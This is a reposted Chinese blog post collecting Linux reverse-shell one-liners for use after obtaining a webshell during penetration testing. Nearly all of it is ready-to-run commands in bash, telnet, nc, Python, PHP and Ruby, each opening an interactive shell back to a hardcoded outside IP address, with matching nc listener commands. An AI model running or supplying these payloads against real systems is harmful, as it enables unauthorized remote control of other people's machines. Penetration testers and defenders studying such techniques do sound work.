【好文转载】linux反弹shell的各种姿势

本文为转载,原作者与链接如下:
作者:@11阳光
https://www.cnblogs.com/sunny11/p/14290092.html

题记

搞完xss钓鱼一时不知道服务器还能干点什么,然后我就想到我cs搞了Windows,当然也要弹linux的shell,所以操作下linux反弹shell的命令。

在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是 通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹 shell来进行操作。在这里总结下反弹shell常见的几种姿势。

准备工作

外网服务器103.234.72.5
本地Kali一台,优班图一台。

Bash反弹

注意之前使用nc监听端口反弹shell时都会有一个警告:Warning: forward host lookup failed for bogon: Unknown host,根据nc帮助文档的提示加上-n参数就可以不产生这个警告了,-n参数代表在建立连接之前不对主机进行dns解析。

参考文章:

  1. 🔗Linux下几种反弹Shell方法的总结与理解 http://sohu.com/a/243607685_354899
  2. 🔗linux反弹shell的姿势-Avenue-le.pdf

方法一

监听的vps使用命令:

nc -nlvp 7777

被控机器使用命令:

#命令1:
bash -i >& /dev/tcp/103.234.72.5/7777 0>&1
#命令2:
bash -c 'exec bash -i &>/dev/tcp/103.234.72.5/7777 <&1'
#bash ‐i 打开一个交互的bash
# >& 将标准错误输出重定向到标准输出
#/dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为 要反弹到的主机ip,port为端口
# 0>&1 标准输入重定向到标准输出,实现你与反弹出来的shell的交互

Kali外网攻击机
内网受害者

方法二

在使用这个进行shell反弹时,不能使用python获取一个标准的shell,需要使用 nc再次反弹之后,使用python获取标准化输出。

监听的vps使用命令:

nc -nlvp 7777

被控机器使用命令:

exec 5<>/dev/tcp/103.234.72.5/7777;cat <&5 | while read line; do $line 2>&5 >&5; done 

在这里插入图片描述
在这里插入图片描述

方法三

命令一:

exec 0&0 2>&0 0<&196;exec 196<>/dev/tcp/103.234.72.5/7777; sh <&196 >&196 2>&196

在这里插入图片描述
在这里插入图片描述

命令二:

/bin/bash -i > /dev/tcp/103.234.72.5/6666 0<&1 2>&1

在这里插入图片描述
在这里插入图片描述

方法四

0<&196;exec 196<>/dev/tcp/103.234.72.5/7777; sh <&196 >&196 2>&196

在这里插入图片描述
在这里插入图片描述

bash UDP 反弹

nc -u -nlvp 7777
sh -i >& /dev/udp/103.234.72.5/7777 0>&1

在这里插入图片描述
在这里插入图片描述

telnet反弹

方法一

nc -nlvp 6666
nc -nlvp 7777
telnet 103.234.72.5 6666 | /bin/bash | telnet 103.234.72.5 7777

6666输入命令7777输出结果
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

方法二

mknod a p; telnet 103.234.72.5 7777 0<a | /bin/bash 1>a(不好用)

nc反弹

nc ‐e /bin/bash 103.234.72.5 7777

在这里插入图片描述
在这里插入图片描述
如果目标主机linux发行版本没有 -e 参数,还有以下方式:

方法一

rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 103.234.72.5 7777 >/tmp/f

在这里插入图片描述
在这里插入图片描述

exec 反弹

0<&196;exec 196<>/dev/tcp/103.234.72.5/7777; sh <&196 >&196 2>&196

在这里插入图片描述
在这里插入图片描述

python反弹

export RHOST="103.234.72.5";export RPORT=7777;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

在这里插入图片描述
在这里插入图片描述

PHP反弹

php -r '$sock=fsockopen("103.234.72.5",7777);exec("/bin/sh -i <&3 >&3 2>&3");'

在这里插入图片描述
在这里插入图片描述

ruby 反弹

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("103.234.72.5","7777");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

在这里插入图片描述
在这里插入图片描述

其他

我这里写了一些常用的,当其他的用的时候在去深入研究。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值